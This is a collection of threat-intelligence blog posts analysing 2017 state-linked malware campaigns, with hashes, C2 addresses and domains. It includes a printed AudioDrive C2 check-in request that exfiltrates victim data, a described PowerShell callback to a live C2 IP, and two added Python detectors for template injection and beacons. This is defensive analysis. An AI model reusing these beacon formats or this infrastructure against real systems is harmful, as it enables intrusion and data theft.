Could BadRabbit Ransomware Be Linked To Previously Warned Supply Chain Attack

News has broken about a new widespread ransomware attack using a new variant called "BadRabbit." At this time, organizations in Russia and Ukraine appear to be the most heavily impacted. Most notably, Russian media outlets and Ukrainian government and critical infrastructure entities are seeing disruptive effects.

Security researchers are already noting similarities between this wave of attacks and the NotPetya attacks that caused widespread disruption back in June 2017 and had a particularly significant effect on entities in Ukraine. While NotPetya initially appeared to be a widespread ransomware attack similar to WannaCry, it was later determined that the malware was a disk wiper with destructive intent rather than typical financially-motivated ransomware. Effects from NotPetya were centered on Ukraine because the initial delivery mechanism was a supply chain attack in which malicious actors compromised the update server for software called "M.E.Doc," a widely deployed accounting package used by many organizations in Ukraine as well as by businesses with operations there (which explains why effects were felt outside Ukraine).

DHS Releases Additional Information Regarding Targeted Activity Against Critical Infrastructure

On October 20, 2017 the U.S. Department of Homeland Security released TA17-293A, providing significant detail regarding targeted activity against critical infrastructure organizations as well as the government. Definitive attribution of this activity is not given; however, the DHS alert does mention that a recent report by Symantec on the actor it calls "Dragonfly" aligns with the activity described in TA17-293A. Symantec equates Dragonfly with "Energetic Bear," a name used by CrowdStrike to describe a Russian adversary that has historically targeted the energy sector.

Although not specifically called out in TA17-293A, these appear to be additional details regarding the same campaign that was widely reported in the media in July. The Cyber Intelligence and Policy Project (CIPP) wrote a blog post related to this activity in July.

Below is a consolidated list of indicators provided by DHS in TA17-293A. CIPP is continuing to conduct analysis to find additional publicly available information that may shed some more light on this campaign.

MD5 Hashes:

038a97b4e2f37f34b255f0643e49fc9d
31008de622ca9526f5f4a1dd3f16f4ea
5acc56c93c5ba1318dd2fa9c3509d60b
65a1a73253f04354886f375b59550b46
722154a36f32ba10e98020a8ad758a7a
8341e48a6b91750d99a8295c97fd55d5
99aa0d0eceefce4c0856532181b449b1
a6d36749eebbbc51b552e5803ed1fd58
4383c60926261d467662f95b11efc044
e29d1f5d79cd906f75c88177c7f6168e
04738ca02f59a5cd394998a99fcd9613
3b6c3df08e99b40148548e96cd1ac872
5dbef7bddaf50624e840ccbce2816594
61c909d2f625223db2fb858bbdf42a76
61e2679cd208e0a421adc4940662c583
7dbfa8cbb39192ffe2a930fc5258d4c1
8943e71a8c73b5e343aa9d2e19002373
a07aa521e7cafb360294e56969eda5d6
aa905a3508d9309a93ad5c0ec26ebc9b
aeee996fd3484f28e5cd85fe26b6bdcd
ba756dd64c1147515ba2298b6a760260

IP Addresses:

5.153.58.45
91.183.104.150
67.199.248.10
104.20.219.42
192.81.76.117
187.130.251.249
184.154.150.66
2.229.10.193
41.78.157.34
176.53.11.130
82.222.188.18
130.25.10.158
41.205.61.221
5.150.143.107
193.213.49.115
195.87.199.197
167.114.44.147

Domains/URLs:

imageliners[.]com
bit[.]ly/2m0x8IH
tinyurl[.]com/h3sdqck

Recent Report on SYSCON Malware Reveals Overlaps with KONNI Malware Campaigns

Today, Trend Micro released a blog post regarding malware it refers to as "SYSCON" which uses the file transfer protocol (FTP) as a command and control (C2) channel. The blog notes likely targeting of the Red Cross and World Health Organization based on lure documents used to deliver the malware. The Cyber Intelligence and Policy Project (CIPP) was able to identify significant overlap between what is described in Trend Micro's post and operations referred to in previous public reporting that used the malware known as "KONNI."

The Potential for Increased Financially-Motivated North Korean Cyber Operations in the Face of Increasing International Pressure

With North Korea becoming increasingly isolated from the world economy, the likelihood that it will use its cyber capabilities for financial gain grows. The United Nations has already imposed significant sanctions on North Korea; however, a recent announcement by China that it will shut down North Korean companies operating within its borders could indicate significant financial trouble for North Korea.

Lawfare recently released a podcast of an excellent talk by UC San Diego professor Stephan Haggard that describes the economic pressures the international community is placing on North Korea. He describes how the US uses access to its financial system as one lever; however, China currently accounts for 90% of North Korea's trade, making it the key factor in how severe financial pressure on North Korea can get. With the Chinese recently indicating that they will increasingly restrict North Korean business activity, the chances are increasing that North Korea will turn to its cyber capabilities in an attempt to mitigate the effects of financial sanctions.

North Korea has previously shown a desire and ability to conduct financially-motivated cyber operations as evidenced by previous attacks on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) platform. More recently, it has been reported by FireEye that cyber activity linked to North Korea has targeted entities involved with Bitcoin indicating that it may have interest in cryptocurrencies as a way to circumvent sanctions and provide financial assets in the face of these measures.

In this post, the Cyber Intelligence and Policy Project (CIPP) briefly reviews the financially-motivated attacks on the SWIFT system by North Korean actors, and also looks at a couple of malicious files possibly linked to North Korean actors that may have been used in more recent operations targeting cryptocurrency organizations and more traditional financial systems.

SWIFT Attacks

In February 2016 an attacker gained access to the Bangladesh central bank's SWIFT payment system and set into motion the transfer of a large sum of money from the bank's account to accounts in the Philippines. The attackers attempted to steal nearly one billion dollars. The Bangladesh central bank was able to put a stop to most of the transfer orders; however, $81 million was never recovered.

The attackers used a number of tools to gain and maintain access to the bank's systems, among them multiple tools designed specifically to affect SWIFT systems. These tools were capable of collecting information about SWIFT transactions, disabling protection mechanisms present in the SWIFT software, and altering files passed within the system.

In addition to the Bangladesh incident there were a number of other incidents at banks around the world in which SWIFT systems were similarly targeted. Both Kaspersky and BAE Systems noted code-level similarities between the malware used in the SWIFT attacks and malware attributed to the North Korean actor known as Lazarus.

Recent Financial-themed Attacks Potentially Linked to North Korea

The SWIFT attacks were the first high-profile incidents to highlight financially-motivated attacks linked to North Korean operators. Since that time additional North Korean cyber operations have been observed with possible financial motivations. In researching this post CIPP identified two financially-themed malicious documents in open source that may be linked to North Korea.

Bitcoin-themed Incident (08e128a70d1c96ae403fde40e2471389)

This file appears to have been created in late July 2017 and bears the file name 비트코인_지갑주소_및_거래번호.doc (Machine Translation: Bit coin _ wallet address _ and _ transaction number .doc). The Hybrid Analysis platform shows that malicious macro code writes an executable named svchost.exe to the victim machine and then contacts the domain www.unsunozo[.]org for command and control (C2). A Korean language decoy document is also displayed which appears to contain details of a Bitcoin transaction.

The C2 domain in this case is a legitimate site of a South Korean trade union for freight transport workers. It was likely compromised for use in this malicious activity; however, nothing else is known at this time about the nature of the network traffic to this site. CIPP was unable to identify the malware written by the document. 

Financial Institution-themed Incident (9b7efc5b1fce6bbe6e4538b9e38e4aa5)

A search based on code from the previous document revealed a second, similar document likely deployed a couple of weeks later. This one also writes an executable to the victim machine and contacts two IP addresses for C2: 176.35.250[.]93 and 64.86.34[.]24. The decoy file in this case is an English-language job description for a software developer at a US-based financial institution.

Again, CIPP is not able to identify the malware written by the document.

CIPP cannot confirm these documents are linked to North Korean cyber espionage activity. However, as the previously cited FireEye report indicates, North Korean actors have targeted cryptocurrency entities in South Korea. The Korean-language, Bitcoin-themed document described above fits within this reported tactic. The second, English-language document shares code with the Bitcoin document. Open source does not indicate this code is widely used, so it is possible that the two documents can be linked to the same actor, or possibly to different actors using similar tooling.

It should also be noted that while decoy content may indicate that these files were used to target the financial sector, CIPP cannot definitively identify targets in these instances.

Conclusion

As North Korea becomes increasingly isolated the probability that it will conduct financially-motivated cyber operations increases. The attacks on the SWIFT platform show that North Korean actors are capable of carrying out successful attacks against traditional financial systems. Cryptocurrencies such as Bitcoin could offer another avenue for North Korea as it attempts to bolster its financial stability in the face of intense international pressure. Current favorable exchange rates as well as uncertain legal and regulatory frameworks could make cryptocurrencies an attractive target for North Korea's cyber operations.

Incident Report: Malicious Document With Bangladesh Theme Possibly Linked to Patchwork Actor

Overview

The Cyber Intelligence and Policy Project (CIPP) has identified a malicious Microsoft Word document possibly linked to the actor publicly known as "Patchwork." VirusTotal indicates that the document carries the file name Bangladesh_Army_News.doc and was created on September 26, 2017. The Hybrid Analysis sandbox indicates that the document contains a malicious macro that uses code to download an executable from the command and control (C2) domain, clep-cn[.]org. CIPP was able to retrieve this executable (202KSL.exe) indicating that the actor responsible is likely still active. 

Hybrid Analysis shows that the document displays content related to the Bangladesh Army. The clep-cn[.]org C2 domain appears to refer to the Chinese Lunar Exploration Program (CLEP). This confluence of Bangladeshi and Chinese indicators suggests that targeting related to this file could center around the current Rohingya refugee crisis in Bangladesh, in which China's interests are implicated.

In July 2016, the security company Cymmetria released a report about a targeted intrusion actor it referred to as "Patchwork." The report speculated that this was a possible pro-Indian actor with an interest in collecting information regarding China's activities. The clep-cn[.]org domain shares a China-focused naming convention similar to those provided in Cymmetria's report; furthermore, a Bangladesh-themed document would be especially appropriate at the current time given China's interest in the Rohingya refugee crisis there.

Details

Exploit Document:

Retrieved Files:

C2:

  • clep-cn[.]org

Related Infrastructure: 

  • 723863.chinamil[.]info
  • chinamil[.]info
  • ftp.pla-report[.]net
  • militaryreviews[.]net
  • pla-report[.]net
  • sinodefence[.]info
  • www.chinamil[.]info
  • www.militaryreviews[.]net
  • www.pla-report[.]net
  • www.qzonecn[.]com
  • www.sinodefence[.]info

Targeting:

  • China

Related Public Reporting:

  • http://blog.cymmetria.com/research-report-how-we-caught-patchwork-the-copy-paste-apt

Actor/Campaign:

  • Patchwork

Similarities Between CVE-2017-8759 and CVE-2017-0199 Highlight the Possibility of Proliferation of New Exploit

Yesterday, FireEye published a blog post about a new zero-day vulnerability, CVE-2017-8759, in Microsoft's .NET Framework that allows attackers to execute code remotely via a malicious document or application. The only confirmed malicious activity involving this exploit appeared to target a Russian speaking audience with FinSpy malware.

There appear to be a couple of Microsoft RTF documents leveraging CVE-2017-8759 discussed in open source:

As we mentioned in a tweet yesterday, FireEye's blog notes similarities between CVE-2017-8759 and CVE-2017-0199, which numerous bad actors have assimilated into their operations since its public disclosure. First, the earliest known in-the-wild use of both exploits targeted Russian-speaking audiences with FinSpy malware. In addition, the exploit/malware installation chains are similar. While CVE-2017-0199 is a vulnerability in Microsoft Office and CVE-2017-8759 is in the .NET Framework, for which Office documents are a likely delivery vector, both appear to rely on scripts (specifically, HTA scripts) early in the chain to download the final payloads.

Given these similarities, it is entirely possible that CVE-2017-8759 will proliferate among bad actors. Within a matter of days, maybe a matter of hours, of CVE-2017-0199's public disclosure multiple criminal and cyber espionage actors started to leverage the exploit in their operations. There's already a GitHub page up incorporating the exploit code into a macro-enabled Word document. Given the nature of this new exploit it could be incorporated into any kind of Office document and possibly into other delivery vehicles as well.

Incident Report: Recent Incident Reportedly Targeting Saudi Arabia With Links To Greenbug and OilRig Actors

Overview

Open source reporting recently indicated new activity from the Iranian actor publicly known as Greenbug targeting Saudi Arabia. The incident used a Microsoft Excel file containing malicious macros which wrote a malicious executable and associated files to the victim machine. The executable in this instance appears to be a variant of a Trojan known as ISMAgent and uses the domain www.ntpupdateserver[.]com for command and control (C2). This domain has been previously reported as an ISMAgent C2.

In July 2017, Palo Alto Networks' Unit 42 reported overlaps between Greenbug and another Iranian actor it calls OilRig. The overlap centered around a cyber espionage operation at a Middle Eastern technology organization using tactics associated with OilRig, but leveraging a variant of Greenbug's ISMDoor malware which Palo Alto named ISMAgent. Additional public reporting on this overlap is not available, but it could indicate that OilRig and Greenbug are one and the same, or two different threat groups sharing some of the same tools.

Details

Exploit Document:

  • b518cd2349b490514d1ff1a2a6ec09ec (Macros)

Dropped Files (Directory: /Users/Public/Libraries):

  • B642.txt (9e5ce9b94471f1ba58099857020105a8) 
  • OfficeServicesStatus.vbs (46f4bb9e734c64d71cd8fdc0fc9e6f73) 
  • RecordedTV.library-ms (b6f9aa44c5f0565b5deb761b1926e9b6)
  • servicereset.exe (ad5120454218bb483e0b8467feb3a20f)

C2:

  • www.ntpupdateserver[.]com

Related Infrastructure: 

  • www.adobeproduct[.]com
  • www.cdnmsnupdate[.]com
  • n.n.c.303FF7B225C14F1498A2.cdnmsnupdate[.]com
  • www.microsoft-publisher[.]com

Related Malware:

  • 5a3675ebb6a560a25c6583cae847a41e
  • 66eaef10226fb279dba64bb5948bc85b
  • 89e7e269391b5efc57842c52038485e2

Targeting:

  • Saudi Arabia

OSINT:

  • https://twitter.com/eyalsela/status/906290052141068288

Actor/Campaign:

  • Greenbug; OilRig

Related Public Reporting:

  • https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon
  • https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/

Document Indicates U.S. Energy/Critical Infrastructure Campaign May Have Hit Europe in March

TARGET COUNTRIES: U.S. (MAY 2017); EUROPE (MARCH 2017) (SUSPECTED)

TARGET SECTOR: ENERGY/CRITICAL INFRASTRUCTURE

TTPS: MALICIOUS DOCUMENTS, STRATEGIC WEB COMPROMISE/WATERING HOLE (POSSIBLE)

There has been significant media attention around a campaign likely by a nation-state actor targeting energy organizations in the U.S. including entities operating nuclear facilities. Although there does not appear to be any direct evidence in the open source at this time, media reports indicated that U.S. government officials have linked the campaign to Russia.

Initial warning appears to have come in the form of a joint DHS-FBI bulletin at the end of June. This alert is not publicly available, but the team over at Talos released a blog on July 7 that appears to detail at least part of this campaign. The Cyber Intelligence and Policy Project (CIPP) dug into the Talos analysis and discovered a couple of unreported items of interest related to this campaign:

  • The actor behind the U.S. operation was likely active at least as far back as March 2017 possibly targeting similar Energy/Critical Infrastructure entities in Europe.
  • Indicators that may be related to the “watering hole” element of this campaign. 

Malicious Document Deployed in March 2017

This all begins with the three IP addresses provided at the end of the Talos blog post:

  • 184[.]154[.]150[.]66
  • 5[.]153[.]58[.]45
  • 62[.]8[.]193[.]206

Googling 184[.]154[.]150[.]66 reveals a very interesting file (MD5: 3c432a21cfd05f976af8c47a007928f7) submitted to the Hybrid Analysis platform on July 10, 2017. The file name "Report03-23-2017.docx" suggests that this document may date back to March. A look at publicly available information in VirusTotal for this file supports a March deployment timeframe, as it shows a ZipModifyDate of March 24, 2017 and shows that the file was first submitted to the platform on that same day.

Analysis of this document reveals that it is extremely similar to those reported in the Talos blog. Most notably, the March document contained the same template injection code reported by Talos.

Template Injection Code from March 2017 Document

Template Injection Code from Document Analyzed by Talos Related to Recent U.S. Campaign

As the screenshots show, both contain the same unique “rId1337” Relationship ID and both use the same [remote IP address]/[*.dotm] URL target format. Furthermore, the March document contains the 184[.]154[.]150[.]66 IP address that Talos links to the U.S. campaign.
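The template injection described above lives entirely in the document's relationship parts: word/settings.xml carries a w:attachedTemplate element whose r:id points at a Relationship in word/_rels/settings.xml.rels with TargetMode="External" and a remote .dotm target. The following Python script is an added example and not code from this post or from Talos. It pulls every external relationship out of a .docx, narrows them to attachedTemplate entries pointing at a URL or UNC path, and flags targets matching the [remote IP address]/[*.dotm] format seen in both documents. The sample .docx it builds is constructed to reproduce that layout using the rId1337 relationship ID and the 184[.]154[.]150[.]66 address from the post; the function names and the regular expressions are this example's own.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Remote target in the [remote IP address]/[*.dotm] format seen in the March
# document and in the documents Talos analyzed (example heuristic).
IP_DOTM_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S*\.dotm$", re.I)


def find_external_relationships(docx_bytes):
    """Return (rels_part, rel_id, rel_type, target) for every Relationship in
    any .rels part of the package whose TargetMode is External."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((part, rel.get("Id"), rel_type, rel.get("Target", "")))
    return hits


def suspicious_templates(docx_bytes):
    """Keep only attachedTemplate relationships that reach out to a URL or UNC
    path, and record whether the target matches the IP/.dotm campaign format."""
    out = []
    for part, rel_id, rel_type, target in find_external_relationships(docx_bytes):
        if rel_type != "attachedTemplate":
            continue
        if re.match(r"^(https?://|\\\\|file:)", target, re.I):
            out.append({"part": part, "rel_id": rel_id, "target": target,
                        "ip_dotm_pattern": bool(IP_DOTM_URL.match(target))})
    return out


def build_sample_docx(template_target, rel_id="rId1337", external=True):
    """Constructed minimal .docx (not a real sample) that reproduces the layout
    the post describes: settings.xml references an attachedTemplate relationship
    whose target is defined in settings.xml.rels."""
    settings = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        f'<w:attachedTemplate r:id="{rel_id}"/></w:settings>'
    )
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="{rel_id}" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}"{mode}/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # Body content is irrelevant to the check; only the .rels parts are parsed.
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    injected = build_sample_docx("http://184.154.150.66/template.dotm")
    for hit in suspicious_templates(injected):
        print(hit)
```

Because the check reads the package relationships rather than the document body, it catches the technique regardless of the decoy content, and the ip_dotm_pattern flag separates this campaign's bare-IP targets from the named-host template links that legitimate corporate documents sometimes carry.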

The decoy displayed by the March document may shed some light on the general nature of its intended targets.

March Document Decoy Content

The content refers to the "Donegal 110Kv Project." Open source information shows that this is the name of a project for installing overhead power lines in Ireland, suggesting a possible target or targets in that country or more broadly within Europe. A recent Bloomberg article hinting that critical infrastructure targets in Europe may have also been affected by this campaign strengthens this possibility. This is bolstered by recent statements from FireEye employees that the actor behind this campaign targeted organizations in Europe and the Middle East, specifically Ireland and Turkey.

Indicators Possibly Related to Watering Hole Activity?

In addition to the March document, open source analysis of the 184[.]154[.]150[.]66 and 5[.]153[.]58[.]45 IP addresses provided in the Talos blog post reveals what could be indicators of reported strategic web compromise or "watering hole" activity used in this campaign.

As the screenshots above show, 184[.]154[.]150[.]66 and 5[.]153[.]58[.]45 have not only .dotm files linked to them, but also .png files, and, in one instance, a JavaScript file. The Talos post only mentions the malicious documents as containing .dotm-related URLs with no mention of image or JavaScript files. If the .png and .jspa files are not linked to use of malicious documents, it is possible that they are linked to the “watering hole” element of this campaign which was very briefly mentioned in the media. CIPP was unable to obtain any of these files and their purpose remains unknown. 

Conclusion

There is still a lot that is unknown about this campaign. U.S. government officials have gone on the record pointing the finger at a Russian actor, but there is no publicly available information that provides clear overlap to a known group. What does appear to be clear is that the actor responsible for the U.S.-focused campaign reported on in the Talos blog post was active in March 2017 possibly targeting similar organizations in Europe.

NATO-Themed Word Document Containing Malicious Macros

TARGET: NATO OR NATO-ASSOCIATED ORGANIZATIONS (SUSPECTED)

TOOLS: WORD DOCUMENT WITH MALICIOUS MACROS

On March 17, 2017 the Cyber Intelligence and Policy Project (CIPP) noticed an interesting Microsoft Word file pop up over at Payload Security's Hybrid Analysis site. The file (MD5: f5eccbe4b4cae9be19751eaf0bb8ceaf) bore the name CAG-Meeting 21-22 MAR 2017-Calling Notice-FINAL.doc. Some brief analysis reveals that this document contains a malicious macro along with a decoy concerning an upcoming North Atlantic Treaty Organization (NATO) meeting, with reference to the NATO Defence Planning Process, a mechanism for NATO members to "harmonize their national defense plans with those of NATO."

                                                   Screenshot Of NATO-Themed Decoy

The malicious macro code is stored in two different streams: ThisDocument.cls and Module1.bas. The first contains Base64-encoded data and the second acts as a decoder for that data. The code for Module1.bas was taken from a GitHub-hosted module meant to encode and decode Base64 data.

ThisDocument.cls

Module1.bas

Together these macros decode data and write it to two files: MicrosoftProfile.vbs and MSOffice.ps1. The VBScript file simply executes the PowerShell file which contains code to contact a command and control (C2) at http://193.29.187.194:1011/new/$u in which the value "$u" is replaced with the victim's username appended with four digits.

VBScript and PowerShell Written to Victim

PowerShell Code Showing IP Address

The "DownloadData" string indicates that the code attempts to retrieve additional data from the C2 server, possibly additional malicious code. CIPP attempted to retrieve this second-stage data, but was unsuccessful. It is possible that the actor is using the usernames in the URLs to filter for victims of interest.

This certainly appears to be a targeted incident; however, it is unclear who is behind it. Russia's use of cyber espionage targeting NATO has been well-documented. This incident leaves little to go on. The IP address is not publicly linked to any known cyber espionage activity and the code used in this document shows no clear overlaps with known activity either.

Vipers, Falcons, and Droids: Apparent Link Between Arid Viper/Desert Falcons and Recent Android Malware Targeting Israeli Military

TARGET COUNTRY: ISRAEL

TARGET SECTOR: MILITARY

TOOLS: ANDROID MALWARE, UNIDENTIFIED PC MALWARE

On February 16, 2017, Kaspersky Labs released a blog post detailing a campaign using malware for the Android operating system to target members of the Israel Defense Forces (IDF). Although they don't explicitly mention it, the activity described in Kaspersky's post seems similar to activity reported in January 2017. Both Kaspersky and the January reports indicated that IDF soldiers were being targeted with Android malware via social engineering tactics using sexual themes coming from Facebook. The reports from January explicitly linked the campaign to Hamas.

The Cyber Intelligence and Policy Project (CIPP) dug into the information that Kaspersky released in its blog post. None of the Android malware samples listed in the blog post appear to be available in free, public repositories; however, CIPP was able to pivot off of an email address used to register one of the reported command and control (C2) domains and, using open source tools and free services, identify additional network infrastructure and malware likely linked to the actors carrying out the Android malware campaign.

The additional malware identified by CIPP provides a link between the recent Android campaign targeting IDF soldiers and activity described by Trend Micro and Kaspersky from February 2015 in their Arid Viper and Desert Falcons reports.  

Registrant Email: info[@]palgoal[.]ps

Kaspersky reported five command and control (C2) domains related to the Android malware campaign it's been tracking:

  • androidbak[.]com
  • droidback[.]com
  • endpointup[.]com
  • siteanalysto[.]com
  • goodydaddy[.]com

The androidbak[.]com domain was registered using the email address info[@]palgoal[.]ps.

As the screenshot above shows, androidbak[.]com was registered using information from an organization located in Gaza. This lines up nicely with Kaspersky's reporting saying that the Android malware campaign targeted IDF soldiers serving in Gaza. This registrant email address is actually an interesting case. Often, malicious actors will register their infrastructure under fake email addresses they’ve made up for that purpose. That doesn’t appear to be the case here. The palgoal[.]ps domain actually belongs to an apparently legitimate, Gaza-based web hosting and IT company, PalGoal. As will be discussed below, the email has registered multiple domains linked to malicious activity; however, there are no indications at this point that PalGoal is knowingly involved in malicious activity. It is possible that bad actors are merely leveraging PalGoal’s services for their operations. 

DomainTools shows 25 domains have been registered with the info[@]palgoal[.]ps email. Without a paid subscription, DomainTools won’t reveal what specific domains have been registered using that email. However, there’s a very useful free service called ThreatCrowd (https://www.threatcrowd.org/) which will often have this kind of information, and, in this instance, it does.

There are five suspicious domains highlighted in the screenshot above. The Kaspersky blog post confirms that the androidbak[.]com domain is known to be malicious. There are also three other Android-related domains registered using info[@]palgoal[.]ps which use a similar naming convention and are worth checking out. In addition, the dooownloads[.]com domain appears suspicious as well and deserves some investigation.

Discovering Older Malware Linked To This Campaign

A Google search for the dooownloads[.]com domain reveals that it appeared in a malware file submission to the free malware analysis platform, Malwr, back in October 2015. 

The dumped strings from this file show that dooownloads[.]com is hardcoded into the malware along with another domain, audioodrivers[.]com. Additionally, there appears to be another unique string related to the file's User-Agent, "User-Agent: AudioDrive." A Google search for this string shows that it appears in a handful of other files submitted to various online malware analysis tools.

CIPP was able to gather some basic information about these files including some file names and C2 domains:

Table 1. List of Files with "User-Agent: AudioDrive" String

Available information shows that all of these files make the same initial GET request to their C2 server:

GET /XSounds/sound_q.php?p=[victim machine data]—[unique identifier] HTTP/1.1
Accept: text/*
User-Agent: AudioDrive
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
REMOTE_USER: user
Host: oowdesign[.]com
Cache-Control: no-cache
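The AudioDrive check-in above and the http://193.29.187.194:1011/new/$u callback from the NATO-themed document post earlier on this page are both easy to match on proxy or HTTP logs once the request is broken into its request line and headers. The following Python script is an added example, not code from either post: it parses raw HTTP/1.x requests and applies one rule per beacon, the fixed User-Agent plus /XSounds/sound_q.php path for the AudioDrive samples, and a /new/<username><four digits> path on TCP port 1011 for the NATO document's PowerShell stage. The three requests it checks are constructed to mirror the patterns in the posts, with the placeholder values filled in with invented data; the rule names and helper functions are this example's own.

```python
import re


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into request line and headers.
    Header names are lower-cased for lookup; any body is ignored."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = [line for line in re.split(r"\r?\n", head) if line.strip()]
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def host_port(headers, default=80):
    """Port taken from the Host header, e.g. '193.29.187.194:1011' -> 1011."""
    host = headers.get("host", "")
    if ":" in host:
        return int(host.rsplit(":", 1)[1])
    return default


# One predicate per beacon pattern; each receives a parsed request.
RULES = {
    # AudioDrive samples (Arid Viper/Desert Falcons link): fixed User-Agent and
    # the /XSounds/sound_q.php?p=... check-in path from the request above.
    "audiodrive_checkin": lambda r: (
        r["method"] == "GET"
        and r["headers"].get("user-agent") == "AudioDrive"
        and r["target"].startswith("/XSounds/sound_q.php?p=")
    ),
    # NATO-themed document: PowerShell DownloadData of /new/<username><4 digits>
    # from the C2 on port 1011.
    "nato_doc_powershell_stage2": lambda r: (
        r["method"] == "GET"
        and host_port(r["headers"]) == 1011
        and re.fullmatch(r"/new/[^/\s]+\d{4}", r["target"]) is not None
    ),
}


def match_request(raw):
    """Return the names of every rule the raw request satisfies."""
    req = parse_http_request(raw)
    return [name for name, pred in RULES.items() if pred(req)]


# Constructed requests (not captured traffic); the placeholder values are invented.
AUDIODRIVE_REQUEST = (
    "GET /XSounds/sound_q.php?p=WIN7-VICTIM_user--A1B2C3D4 HTTP/1.1\r\n"
    "Accept: text/*\r\n"
    "User-Agent: AudioDrive\r\n"
    "Accept-Language: en-us\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "REMOTE_USER: user\r\n"
    "Host: oowdesign.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
NATO_STAGE2_REQUEST = (
    "GET /new/jsmith4821 HTTP/1.1\r\n"
    "Host: 193.29.187.194:1011\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET /XSounds/index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (AUDIODRIVE_REQUEST, NATO_STAGE2_REQUEST, BENIGN_REQUEST):
        print(parse_http_request(raw)["target"], "->", match_request(raw))
```

The rules deliberately key on the structural parts of each beacon (method, path shape, User-Agent, port) rather than only on the C2 host, so they keep firing when the operator rotates domains or IP addresses, which both campaigns are known to have done.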

The Colombia File

Among the malware files listed above is one with a rather interesting name, “helicoptero_en_Colombia.scr.” Given that the operator of the campaign being investigated appears to be focused on Israeli targets it is odd to see a related file with a Spanish language file name. 

Decoy Video from helicoptero_en_Colombia.mp4

Analysis of this file (MD5: 1d9ee9c96818ae46a2fee623b4f8e75c) reveals that it is a self-extracting archive (SFX) containing two files: VLC.exe and helicoptero_en_Colombia.mp4. The executable file is the malware. It connects to the C2 domain mentioned above, oowdesign[.]com, and has a compile date of September 14, 2015. 

While the malware is installed on the victim computer the mp4 file is played as a decoy to trick the victim into believing it is a legitimate file. As the file name would suggest, the decoy is a video of a Spanish language news broadcast regarding an August 2015 crash of a Blackhawk helicopter during an operation against the neo-paramilitary group, Los Urabeños. With the crash occurring in early August and the malware being compiled in mid-September 2015 it appears that the malware operator was attempting to use a relatively recent event in order to entice potential targets into opening the file.

Link Back To The Arid Viper Campaign

In addition to other malicious files, the previous screenshot of the Google search for the AudioDrive User Agent string shows a link to a blog written by the cybersecurity company Proofpoint in September 2015. The blog mentions the C2 domain identified above, oowdesign[.]com, and describes malware with the same behavior as the malware samples listed in Table 1. 

The Proofpoint blog expands on research done by Trend Micro about a campaign it dubbed "Operation Arid Viper" which it said exclusively targeted victims in Israel. At almost the same time Trend Micro released the Arid Viper report, Kaspersky released its own report on the same activity but referred to it as "Desert Falcons." The Arid Viper and Desert Falcons reports detail campaigns with the same targeting and general tactics, techniques, and procedures (TTPs) as the recently identified Android malware campaign hitting IDF soldiers. Additionally, the Arid Viper and Desert Falcons reports describe malware that behaves very similarly to the older malware samples CIPP identified above.

Additional Android Malware Sample

CIPP discovered one final malware sample of note. A search of the malware analysis platform VirusTotal for the domain fastdroidmob[.]com shows it is linked to a malicious file.

Remember, the fastdroidmob[.]com domain was registered using info[@]palgoal[.]ps, the address that registered domains linked both to the recent Android malware campaign described by Kaspersky and to the older malware CIPP identified. VirusTotal analysis of the file linked to fastdroidmob[.]com shows it to be malware targeting the Android platform; it was submitted in June 2016. Interestingly, Kaspersky's blog post stated that the campaign it described began around July 2016, so the June 2016 submission of the fastdroidmob[.]com file would predate that timeframe.

It's not clear whether the fastdroidmob[.]com is the same malware Kaspersky describes in its blog post, but there is a notable overlap here.

Assessment

While there is no smoking gun, the following factors suggest that the Android malware campaign described by Kaspersky in its recent blog post is linked to the Arid Viper/Desert Falcons campaign:

  • The address info[@]palgoal[.]ps was used to register C2 infrastructure for the recent Android campaign as well as C2 infrastructure for the 2015 malware samples identified by CCP.
  • The 2015 malware samples behave consistently with those described in the Arid Viper/Desert Falcons reports.
  • That malware appears to be in limited use by a single entity rather than shared among multiple threat actors.
  • The Israel-focused targeting and general TTPs suggest that the recent Android campaign, the older CCP-identified malware, and the Arid Viper/Desert Falcons activity are linked.

